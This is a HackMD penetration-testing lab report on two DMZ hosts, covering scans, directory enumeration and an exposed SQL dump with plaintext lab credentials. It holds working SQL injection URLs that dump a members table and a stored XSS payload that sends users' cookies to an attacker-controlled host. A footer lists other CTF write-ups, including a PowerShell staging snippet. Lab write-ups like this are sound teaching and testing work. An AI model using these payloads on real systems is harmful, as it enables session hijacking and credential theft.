Try   HackMD

BOT lab4

Mateusz Suchocki, Kazimierz Kochan

Basic informations

IP ranges: 10.5.1.0/24 and 10.5.2.0/24
Discovered 3 hosts: 10.5.1.10, 10.5.1.11 and 10.5.2.10

10.5.1.10 (dmza.example.net)

This is a one dmz server with

Nmap scan

PORT    STATE  SERVICE VERSION
80/tcp  open   http    Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: exploit.co.il : Articles : Tutorials : Reviews : Videos

Web content discover

301      GET        9l       31w      344c http://10.5.1.10/admin => http://10.5.1.10/admin/
301      GET        9l       31w      345c http://10.5.1.10/images => http://10.5.1.10/images/
200      GET       45l      178w     2295c http://10.5.1.10/search
301      GET        9l       31w      346c http://10.5.1.10/uploads => http://10.5.1.10/uploads/
200      GET        0l        0w        0c http://10.5.1.10/config
200      GET      129l      406w     5743c http://10.5.1.10/news
200      GET      142l      387w     5050c http://10.5.1.10/downloads
200      GET       46l      184w     2488c http://10.5.1.10/links
301      GET        9l       31w      347c http://10.5.1.10/database => http://10.5.1.10/database/
200      GET      388l     1071w        0c http://10.5.1.10/index
200      GET      388l     1071w        0c http://10.5.1.10/
200      GET      166l      526w     7108c http://10.5.1.10/articles
200      GET       93l      289w     3829c http://10.5.1.10/videos
200      GET        1l       15w      248c http://10.5.1.10/footer
200      GET        1l        3w     9662c http://10.5.1.10/favicon
200      GET       24l      115w     1295c http://10.5.1.10/menu
200      GET      465l     1202w        0c http://10.5.1.10/results
200      GET       98l      243w    16850c http://10.5.1.10/logo
200      GET       70l      211w     2875c http://10.5.1.10/authors
200      GET        1l        2w       50c http://10.5.1.10/dot
200      GET       35l      154w     1920c http://10.5.1.10/newspage

SQL script

Under a /database endpoint there is an exploit.sql script with credentials:

INSERT INTO `members` (`id`, `username`, `password`) VALUES
(1, 'admin', 'P@ssw0rd'),
(2, 'r00t', '1qa2ws'),
(3, 'editor', 'q1w2e3r4');

mails and websites of authors:

INSERT INTO `authors` (`id`, `name`, `mail`, `site`) VALUES
(1, 'NightRanger', 'shai[at]exploit.co.il', 'http://exploit.co.il'),
(2, 'Joe McCray', 'N/A', 'N/A'),
(3, 'Imperva', 'N/A', 'http://www.imperva.com'),
(4, 'PaulDotCom', 'N/A', 'http://pauldotcom.com'),
(5, 'phpacademy', 'N/A', 'N/A'),
(6, 'Raul Siles', 'N/A', 'http://www.raulsiles.com'),
(7, 'SecuriTeam', 'N/A', 'http://www.securiteam.com'),
(8, 'Wikipedia', 'N/A', 'http://www.wikipedia.org'),
(9, 'Prashant Uniyal', 'N/A', 'N/A'),
(10, 'novaca!ne', 'N/A', 'N/A'),
(11, 'GlaDiaT0R', 'N/A', 'N/A'),
(12, 'zeroday', 'N/A', 'N/A'),
(13, 'Chris Anley', 'N/A', 'N/A'),
(14, 'Kevin Spett', 'N/A', 'N/A'),
(15, 'AnalyseR', 'N/A', 'N/A'),
(16, 'Marezzi', 'N/A', 'N/A'),
(17, 'Dapirates', 'N/A', 'N/A'),
(18, 'CWH Underground', 'N/A', 'N/A'),
(19, 'Frego', 'N/A', 'N/A'),
(20, 'Omni', 'N/A', 'N/A');

and some server informations:

-- phpMyAdmin SQL Dump
-- version 3.3.2deb1
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Sep 24, 2010 at 08:20 AM
-- Server version: 5.1.41
-- PHP Version: 5.3.2-1ubuntu4.5

SQL injection

id parameter is vulnerable to sql injection.

http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(schema_name),NULL,NULL,NULL,NULL%20FROM%20information_schema.schemata--%20-

http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,username,password,NULL,NULL,NULL%20FROM%20members--%20-

+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | P@ssw0rd | admin    |
| 2  | 1qa2ws   | r00t     |
| 3  | q1w2e3r4 | editor   |
+----+----------+----------+

Webshell upload

<?php
$servername='localhost';     // Your MySql Server Name or IP address here
$dbusername='root';                // Login user id here
$dbpassword='You should change this passphrase';                // Login password here
$dbname='exploit';     // Your database name here

connecttodb($servername,$dbname,$dbusername,$dbpassword);
function connecttodb($servername,$dbname,$dbuser,$dbpassword)
{
global $link;
$link=mysql_connect ("$servername","$dbuser","$dbpassword");
if(!$link){die("Could not connect to MySQL");}
mysql_select_db("$dbname",$link) or die ("could not open db".mysql_error());
}


?>

Interesting images

Under /images there are two interesting images

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Stored XSS

Payload in note's description:

<script>new Image().src="http://192.168.111.129/cookie.php?c="+document.cookie;</script>

Get a session cookie of users seeing an infected note

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

10.5.1.11 (dmzb.example.net)

Jakbyś potrzebował pomocy to pisz

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Infrastructure misconfiguration

Firewall should block traffic between dmzs

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Last changed by 
Matixx22
0
148

Read more

Web

Kryptos Vault - h3cko The Ticket System is vulnerable to xss. In the Background a headless browser is viewing the tickets. After digging into the application you can get the users JWT session token via XSS. If you have a closer look to the Backend site via the XSS request you will see that there is another Page /Settings and a corresponding JS File to make the page function: http://46.101.59.228:32680/static/js/settings.js. It is possible to update the password of the Moderator via this endpoint using the JWT: POST /api/users/update HTTP/1.1 Host: 46.101.59.228:32680 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0

May 18, 2022
Crypto

How the columns have turned - ex0244 Decryption tool #!/usr/bin/env python3 def blocks(width, txt): len_text = len(txt) block_size = int(len_text / width) return [txt[i:i + block_size] for i in range(0, len(txt), block_size)] def redo(derived_key, blocks):

May 16, 2022
PWN

Space Pirate: Entrypoint - Matixx22 Just use option to insert a password and type anything to get a flag. Space pirate: Going Deeper - Matixx22 (300) I&apos;ve disassebled the binary and there are main and admin_panel functions. Main: Looking at a admin_panel function:

May 16, 2022
Forensics

Puppeteer - H3cko Found a malicious powershell code: [byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3; [byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1; [array]::Reverse($stage2); $stage3 = $stage1 + $stage2;

May 16, 2022
Read more from Matixx22
Published on HackMD